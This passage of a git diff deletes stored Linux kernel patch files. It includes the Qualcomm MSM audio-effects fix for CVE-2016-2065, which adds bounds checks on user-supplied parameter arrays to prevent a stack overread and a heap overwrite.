-+ *updt_params++ = -+ AUDPROC_MODULE_ID_PBE; - *updt_params++ = - AUDPROC_PARAM_ID_PBE_ENABLE; -- *updt_params++ = PBE_ENABLE_PARAM_SZ; -- *updt_params++ = pbe->enable_flag; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - PBE_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ pbe->enable_flag; - } - break; - case PBE_CONFIG: -@@ -719,15 +966,26 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - goto invalid_config; - } - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_PBE; -+ params_length += COMMAND_PAYLOAD_SZ + length; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "PBE_PARAM", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_PBE; - *updt_params++ = - AUDPROC_PARAM_ID_PBE_PARAM_CONFIG; -- *updt_params++ = length; -+ *updt_params++ = -+ length; - for (j = 0; j < length; ) { - j += sizeof(*updt_params); -- *updt_params++ = *values++; -+ *updt_params++ = -+ GET_NEXT( -+ values, -+ param_max_offset, -+ rc); - } -- 
params_length += COMMAND_PAYLOAD_SZ + length; - } - break; - default: -@@ -735,7 +993,7 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - break; - } - } -- if (params_length) -+ if (params_length && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - invalid_config: -@@ -747,15 +1005,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - struct eq_params *eq, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -768,11 +1027,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -- int idx, j; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t idx; -+ int j; - switch (command_id) { - case EQ_ENABLE: - if (length != 1 || index_offset != 0) { -@@ -781,17 +1045,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = eq->enable_flag; -- eq->enable_flag = *values++; -+ eq->enable_flag = -+ GET_NEXT(values, 
param_max_offset, rc); - pr_debug("%s: EQ_ENABLE prev:%d new:%d\n", __func__, - prev_enable_flag, eq->enable_flag); - if (prev_enable_flag != eq->enable_flag) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_ENABLE", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; -- *updt_params++ = AUDPROC_PARAM_ID_EQ_ENABLE; -- *updt_params++ = EQ_ENABLE_PARAM_SZ; -- *updt_params++ = eq->enable_flag; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = -+ AUDPROC_PARAM_ID_EQ_ENABLE; -+ *updt_params++ = - EQ_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ eq->enable_flag; - } - break; - case EQ_CONFIG: -@@ -805,9 +1078,12 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - eq->config.eq_pregain, eq->config.preset_id); - for (idx = 0; idx < MAX_EQ_BANDS; idx++) - eq->per_band_cfg[idx].band_idx = -1; -- eq->config.eq_pregain = *values++; -- eq->config.preset_id = *values++; -- eq->config.num_bands = *values++; -+ eq->config.eq_pregain = -+ GET_NEXT(values, param_max_offset, rc); -+ eq->config.preset_id = -+ GET_NEXT(values, param_max_offset, rc); -+ eq->config.num_bands = -+ GET_NEXT(values, param_max_offset, rc); - if (eq->config.num_bands > MAX_EQ_BANDS) { - pr_err("EQ_CONFIG:invalid num of bands\n"); - rc = -EINVAL; -@@ -822,48 +1098,59 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - goto invalid_config; - } - for (j = 0; j < eq->config.num_bands; j++) { -- idx = *values++; -+ idx = GET_NEXT(values, param_max_offset, rc); - if (idx >= MAX_EQ_BANDS) { - pr_err("EQ_CONFIG:invalid band index\n"); - rc = -EINVAL; - goto invalid_config; - } - eq->per_band_cfg[idx].band_idx = idx; -- eq->per_band_cfg[idx].filter_type = *values++; -+ eq->per_band_cfg[idx].filter_type = -+ GET_NEXT(values, param_max_offset, rc); - eq->per_band_cfg[idx].freq_millihertz = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - 
eq->per_band_cfg[idx].gain_millibels = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - eq->per_band_cfg[idx].quality_factor = -- *values++; -+ GET_NEXT(values, param_max_offset, rc); - } - if (command_config_state == CONFIG_SET) { - int config_param_length = EQ_CONFIG_PARAM_SZ + - (EQ_CONFIG_PER_BAND_PARAM_SZ* - eq->config.num_bands); -+ params_length += COMMAND_PAYLOAD_SZ + -+ config_param_length; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_CONFIG", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; -- *updt_params++ = AUDPROC_PARAM_ID_EQ_CONFIG; -- *updt_params++ = config_param_length; -- *updt_params++ = eq->config.eq_pregain; -- *updt_params++ = eq->config.preset_id; -- *updt_params++ = eq->config.num_bands; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_EQ_CONFIG; -+ *updt_params++ = -+ config_param_length; -+ *updt_params++ = -+ eq->config.eq_pregain; -+ *updt_params++ = -+ eq->config.preset_id; -+ *updt_params++ = -+ eq->config.num_bands; - for (idx = 0; idx < MAX_EQ_BANDS; idx++) { - if (eq->per_band_cfg[idx].band_idx < 0) - continue; - *updt_params++ = -- eq->per_band_cfg[idx].filter_type; -+ eq->per_band_cfg[idx].filter_type; - *updt_params++ = -- eq->per_band_cfg[idx].freq_millihertz; -+ eq->per_band_cfg[idx].freq_millihertz; - *updt_params++ = -- eq->per_band_cfg[idx].gain_millibels; -+ eq->per_band_cfg[idx].gain_millibels; - *updt_params++ = -- eq->per_band_cfg[idx].quality_factor; -+ eq->per_band_cfg[idx].quality_factor; - *updt_params++ = -- eq->per_band_cfg[idx].band_idx; -+ eq->per_band_cfg[idx].band_idx; - } -- params_length += COMMAND_PAYLOAD_SZ + -- config_param_length; - } - break; - case EQ_BAND_INDEX: -@@ -872,7 +1159,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- idx = *values++; -+ idx = GET_NEXT(values, param_max_offset, rc); - if (idx > MAX_EQ_BANDS) { - pr_err("EQ_BAND_INDEX:invalid band index\n"); - rc = 
-EINVAL; -@@ -882,14 +1169,21 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - pr_debug("%s: EQ_BAND_INDEX val:%d\n", - __func__, eq->band_index); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_BAND_INDEX_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_BAND_INDEX", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_EQ_BAND_INDEX; -- *updt_params++ = EQ_BAND_INDEX_PARAM_SZ; -- *updt_params++ = eq->band_index; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - EQ_BAND_INDEX_PARAM_SZ; -+ *updt_params++ = -+ eq->band_index; - } - break; - case EQ_SINGLE_BAND_FREQ: -@@ -902,18 +1196,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - pr_err("EQ_SINGLE_BAND_FREQ:invalid index\n"); - break; - } -- eq->freq_millihertz = *values++; -+ eq->freq_millihertz = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: EQ_SINGLE_BAND_FREQ idx:%d, val:%d\n", - __func__, eq->band_index, eq->freq_millihertz); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_SINGLE_BAND_FREQ_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_SINGLE_BAND_FREQ", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_EQ_SINGLE_BAND_FREQ; -- *updt_params++ = EQ_SINGLE_BAND_FREQ_PARAM_SZ; -- *updt_params++ = eq->freq_millihertz; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - EQ_SINGLE_BAND_FREQ_PARAM_SZ; -+ *updt_params++ = -+ eq->freq_millihertz; - } - break; - default: -@@ -921,7 +1223,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - break; - } - } -- if (params_length && !msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - 
else -@@ -938,9 +1240,10 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - { - int devices; - int num_commands; -- char *params; -+ char *params = NULL; - int *updt_params, i; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -+ long *param_max_offset; - int rc = 0; - - pr_debug("%s: instance: %d\n", __func__, instance); -@@ -949,9 +1252,11 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - __func__); - return -EINVAL; - } -- if (!ac) { -- pr_err("%s: cannot set audio effects as audio client is NULL\n", -- __func__); -+ param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ devices = GET_NEXT(values, param_max_offset, rc); -+ num_commands = GET_NEXT(values, param_max_offset, rc); -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { -+ pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } - params = kzalloc(params_length, GFP_KERNEL); -@@ -959,88 +1264,114 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - pr_err("%s, params memory alloc failed\n", __func__); - return -ENOMEM; - } -- devices = *values++; -- num_commands = *values++; - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case SOFT_VOLUME_GAIN_2CH: - case SOFT_VOLUME2_GAIN_2CH: - if (length != 2 || index_offset != 0) { -- pr_err("VOLUME_GAIN_2CH/VOLUME2_GAIN_2CH:invalid params\n"); -+ pr_err("VOLUME_GAIN_2CH: invalid params\n"); - rc = -EINVAL; - goto invalid_config; - } -- vol->left_gain = *values++; -- 
vol->right_gain = *values++; -+ vol->left_gain = GET_NEXT(values, param_max_offset, rc); -+ vol->right_gain = -+ GET_NEXT(values, param_max_offset, rc); - vol->master_gain = 0x2000; - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VOLUME/VOLUME2_GAIN_2CH", -+ rc); -+ if (rc != 0) -+ break; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN; -- *updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -- *updt_params++ = (vol->left_gain << 16) | -- vol->right_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ (vol->left_gain << 16) | -+ vol->right_gain; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN; - *updt_params++ = - SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -- *updt_params++ = vol->master_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ *updt_params++ = -+ vol->master_gain; - } - break; - case SOFT_VOLUME_GAIN_MASTER: - case SOFT_VOLUME2_GAIN_MASTER: - if (length != 1 || index_offset != 0) { -- pr_err("VOLUME_GAIN_MASTER/VOLUME2_GAIN_MASTER:invalid params\n"); -+ pr_err("VOLUME_GAIN_MASTER: invalid params\n"); - rc = -EINVAL; - goto invalid_config; - } - vol->left_gain = 0x2000; - vol->right_gain = 0x2000; -- vol->master_gain = *values++; -+ vol->master_gain = -+ GET_NEXT(values, 
param_max_offset, rc); - if (command_config_state == CONFIG_SET) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ params_length += COMMAND_PAYLOAD_SZ + -+ SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VOLUME/VOLUME2_GAIN_MASTER", -+ rc); -+ if (rc != 0) -+ break; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN; -- *updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -- *updt_params++ = (vol->left_gain << 16) | -- vol->right_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ SOFT_VOLUME_GAIN_2CH_PARAM_SZ; -+ *updt_params++ = -+ (vol->left_gain << 16) | -+ vol->right_gain; - if (instance == SOFT_VOLUME_INSTANCE_2) - *updt_params++ = -- ASM_MODULE_ID_VOL_CTRL2; -+ ASM_MODULE_ID_VOL_CTRL2; - else -- *updt_params++ = ASM_MODULE_ID_VOL_CTRL; -+ *updt_params++ = -+ ASM_MODULE_ID_VOL_CTRL; - *updt_params++ = - ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN; - *updt_params++ = - SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -- *updt_params++ = vol->master_gain; -- params_length += COMMAND_PAYLOAD_SZ + -- SOFT_VOLUME_GAIN_MASTER_PARAM_SZ; -+ *updt_params++ = -+ vol->master_gain; - } - break; - default: -@@ -1049,7 +1380,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac, - break; - } - } -- if (params_length) -+ if (params_length && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - invalid_config: -diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -index f814434..b4bd43d 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -@@ -2839,7 +2839,7 @@ static int msm_compr_audio_effects_config_info(struct 
snd_kcontrol *kcontrol,
- struct snd_ctl_elem_info *uinfo)
- {
- uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
-- uinfo->count = 128;
-+ uinfo->count = MAX_PP_PARAMS_SZ;
- uinfo->value.integer.min = 0;
- uinfo->value.integer.max = 0xFFFFFFFF;
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2065/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2065/ANY/0001.patch
deleted file mode 100644
index 06b77eb4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2065/ANY/0001.patch
+++ /dev/null
@@ -1,1511 +0,0 @@
-From 775fca8289eff931f91ff6e8c36cf2034ba59e88 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang
-Date: Wed, 16 Mar 2016 12:51:03 +0800
-Subject: ASoC: msm: audio-effects: fix stack overread and heap overwrite
-
-Fix overwrite of updt_params allocated in heap, and stack overread
-where param pointer is passed from user space.
-
-CRs-Fixed: 989628
-Change-Id: Ida8bdb7da2fcb97023dce3b6eafe4b899a51cb66
-Signed-off-by: Weiyin Jiang
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 3 +-
- include/sound/msm-audio-effects-q6-v2.h | 4 +-
- sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 835 +++++++++++++++++------
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 2 +-
- 4 files changed, 588 insertions(+), 256 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index c100c47..3ba20ca 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -20,7 +20,6 @@
- #include
-
- #define MAX_CHANNELS_SUPPORTED 8
--#define MAX_PP_PARAMS_SZ 128
- #define WAIT_TIMEDOUT_DURATION_SECS 1
-
- struct q6audio_effects {
-diff --git a/include/sound/msm-audio-effects-q6-v2.h b/include/sound/msm-audio-effects-q6-v2.h
-index cbdea32..6bc2338 100644
---- a/include/sound/msm-audio-effects-q6-v2.h
-+++ b/include/sound/msm-audio-effects-q6-v2.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -16,6 +16,8 @@
-
- #include
-
-+#define MAX_PP_PARAMS_SZ 128
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- int topology);
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-index e26c453..1c08842 100644
---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -20,6 +20,24 @@
-
- #define MAX_ENABLE_CMD_SIZE 32
-
-+#define GET_NEXT(ptr, upper_limit, rc) \
-+({ \
-+ if (((ptr) + 1) > (upper_limit)) { \
-+ pr_err("%s: param list out of boundary\n", __func__); \
-+ (rc) = -EINVAL; \
-+ } \
-+ ((rc) == 0) ? *(ptr)++ : -EINVAL; \
-+})
-+
-+#define CHECK_PARAM_LEN(len, max_len, tag, rc) \
-+do { \
-+ if ((len) > (max_len)) { \
-+ pr_err("%s: params length overflows\n", (tag)); \
-+ (rc) = -EINVAL; \
-+ } \
-+} while (0)
-+
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- int topology)
- {
-@@ -109,15 +127,16 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- struct virtualizer_params *virtualizer,
- long *values)
- {
-- int devices = *values++;
-- int num_commands = *values++;
-- char *params;
-+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+ char *params = NULL;
-+ int rc = 0;
-+ int devices = GET_NEXT(values, param_max_offset, rc);
-+ int num_commands = GET_NEXT(values, param_max_offset, rc);
- int *updt_params, i, prev_enable_flag;
- uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-- int rc = 0;
-
- pr_debug("%s\n", __func__);
-- if (!ac) {
-+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- pr_err("%s: cannot set audio effects\n", __func__);
- return -EINVAL;
- }
-@@ -130,10 +149,14 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- updt_params = (int *)params;
- params_length = 0;
- for (i = 0; i < num_commands; i++) {
-- uint32_t command_id = *values++;
-- uint32_t command_config_state = *values++;
-- uint32_t index_offset = *values++;
-- uint32_t length = *values++;
-+ uint32_t command_id =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t command_config_state =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t index_offset =
-+ GET_NEXT(values, param_max_offset, rc);
-+ uint32_t length =
-+ GET_NEXT(values, param_max_offset, rc);
- switch (command_id) {
- case VIRTUALIZER_ENABLE:
- if (length != 1 || index_offset != 0) {
-@@ -142,17 +165,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- goto invalid_config;
- }
- prev_enable_flag = virtualizer->enable_flag;
-- virtualizer->enable_flag = *values++;
-+ virtualizer->enable_flag =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s:VIRT ENABLE prev:%d, new:%d\n", __func__,
- prev_enable_flag, virtualizer->enable_flag);
- if (prev_enable_flag != virtualizer->enable_flag) {
-- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-- *updt_params++ =
-- AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
-- *updt_params++ = VIRTUALIZER_ENABLE_PARAM_SZ;
-- *updt_params++ = virtualizer->enable_flag;
- params_length += COMMAND_PAYLOAD_SZ +
- VIRTUALIZER_ENABLE_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "VIRT ENABLE", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_VIRTUALIZER;
-+ *updt_params++ =
-+ AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
-+ *updt_params++ =
-+ VIRTUALIZER_ENABLE_PARAM_SZ;
-+ *updt_params++ =
-+ virtualizer->enable_flag;
- }
- break;
- case VIRTUALIZER_STRENGTH:
-@@ -161,17 +193,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- virtualizer->strength = *values++;
-+ virtualizer->strength =
-+ GET_NEXT(values, param_max_offset, rc);
- pr_debug("%s: VIRT STRENGTH val: %d\n",
- __func__, virtualizer->strength);
- if (command_config_state == CONFIG_SET) {
-- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+ params_length += COMMAND_PAYLOAD_SZ +
-+ VIRTUALIZER_STRENGTH_PARAM_SZ;
-+ CHECK_PARAM_LEN(params_length,
-+ MAX_INBAND_PARAM_SZ,
-+ "VIRT STRENGTH", rc);
-+ if (rc != 0)
-+ break;
-+ *updt_params++ =
-+ AUDPROC_MODULE_ID_VIRTUALIZER;
- *updt_params++ =
- AUDPROC_PARAM_ID_VIRTUALIZER_STRENGTH;
-- *updt_params++ = VIRTUALIZER_STRENGTH_PARAM_SZ;
-- *updt_params++ = virtualizer->strength;
-- params_length += COMMAND_PAYLOAD_SZ +
-+ *updt_params++ =
- VIRTUALIZER_STRENGTH_PARAM_SZ;
-+ *updt_params++ =
-+ virtualizer->strength;
- }
- break;
- case VIRTUALIZER_OUT_TYPE:
-@@ -180,17 +221,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- rc = -EINVAL;
- goto invalid_config;
- }
-- virtualizer->out_type = *values++;
-+ virtualizer->out_type = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: VIRT OUT_TYPE val:%d\n", - __func__, virtualizer->out_type); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER; -+ params_length += COMMAND_PAYLOAD_SZ + -+ VIRTUALIZER_OUT_TYPE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VIRT OUT_TYPE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_VIRTUALIZER; - *updt_params++ = - AUDPROC_PARAM_ID_VIRTUALIZER_OUT_TYPE; -- *updt_params++ = VIRTUALIZER_OUT_TYPE_PARAM_SZ; -- *updt_params++ = virtualizer->out_type; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - VIRTUALIZER_OUT_TYPE_PARAM_SZ; -+ *updt_params++ = -+ virtualizer->out_type; - } - break; - case VIRTUALIZER_GAIN_ADJUST: -@@ -199,18 +249,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- virtualizer->gain_adjust = *values++; -+ virtualizer->gain_adjust = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: VIRT GAIN_ADJUST val:%d\n", - __func__, virtualizer->gain_adjust); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER; -- *updt_params++ = -- AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST; -- *updt_params++ = -- VIRTUALIZER_GAIN_ADJUST_PARAM_SZ; -- *updt_params++ = virtualizer->gain_adjust; - params_length += COMMAND_PAYLOAD_SZ + - VIRTUALIZER_GAIN_ADJUST_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "VIRT GAIN_ADJUST", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_VIRTUALIZER; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST; -+ *updt_params++ = -+ VIRTUALIZER_GAIN_ADJUST_PARAM_SZ; -+ *updt_params++ = -+ virtualizer->gain_adjust; - } - break; - default: -@@ -218,7 +276,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac, - break; - } - } -- if (params_length && 
!msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - else -@@ -232,15 +290,16 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - struct reverb_params *reverb, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -253,10 +312,14 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case REVERB_ENABLE: - if (length != 1 || index_offset != 0) { -@@ -265,16 +328,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - goto invalid_config; - } - 